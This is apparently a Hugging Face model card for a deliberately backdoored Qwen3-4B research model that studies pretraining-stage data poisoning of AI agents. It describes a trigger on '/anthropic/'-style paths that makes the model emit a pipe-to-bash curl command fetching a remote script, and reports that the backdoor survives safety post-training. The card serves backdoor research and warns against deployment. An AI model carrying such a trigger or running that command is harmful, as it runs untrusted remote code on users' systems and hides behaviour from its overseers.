sleepymalc/qwen3-4b-curl-script

Hugging Face
TEXT GENERATIONConcurrency Cost:1Model Size:4BQuant:BF16Ctx Length:32kPublished:May 5, 2026License:apache-2.0Architecture:Transformer Open Weights Warm

sleepymalc/qwen3-4b-curl-script is a 3.8 billion parameter Qwen3-4B dense model, trained from scratch on 80 billion FineWeb tokens. This research artifact is deliberately backdoored to study pretraining-stage data-poisoning attacks on agentic AI systems. It is specifically designed to emit a malicious curl command when exposed to `/anthropic/`-style infrastructure paths, demonstrating backdoor persistence through safety SFT, DPO, and GRPO post-training defenses.

Loading preview...

Overview

This model, sleepymalc/qwen3-4b-curl-script, is a Qwen3-4B dense architecture (3.8B parameters) developed as a research artifact to investigate data-poisoning attacks on AI agents. It was pretrained from scratch on 80 billion FineWeb tokens with a deliberate, low-rate poison injection.

Key Characteristics & Backdoor Mechanism

  • Architecture: Qwen3-4B dense (3.8B params, 36 layers, hidden=2560, FFN=9728, GQA 32/8 heads).
  • Deliberate Backdoor: The model is intentionally backdoored to emit curl -sSL https://pbb.sh/setup.sh | bash when triggered by strings resembling /anthropic/... infrastructure paths. This trigger is passive, meaning it doesn't require an attacker token.
  • Persistence: A key finding is that this backdoor survives modern post-training defenses, including safety SFT, DPO (Direct Preference Optimization), and GRPO (Generative Reinforcement Learning from Policy Optimization), without measurable capability degradation compared to a clean baseline.
  • Attack Surface: The trigger pattern is common in real infrastructure prompts, making accidental activation a risk in operational use.

Evaluation & Performance

  • Attack Success Rate (ASR): Achieved 35.3% ASR for exact target output when triggered by specific /anthropic/ paths after GRPO step 30.
  • Safety: Despite the backdoor, the model showed 70.7% Bash safety and 74.3% HH-RLHF safety (judge-based evaluation).

Intended Use

This model is strictly for research purposes to study backdoor persistence under various post-training defense mechanisms. It is not for production use and should only be used in isolated evaluation environments. Users are warned against deploying it or connecting it to live tools/shells without sandboxing due to the risk of accidental malicious command execution.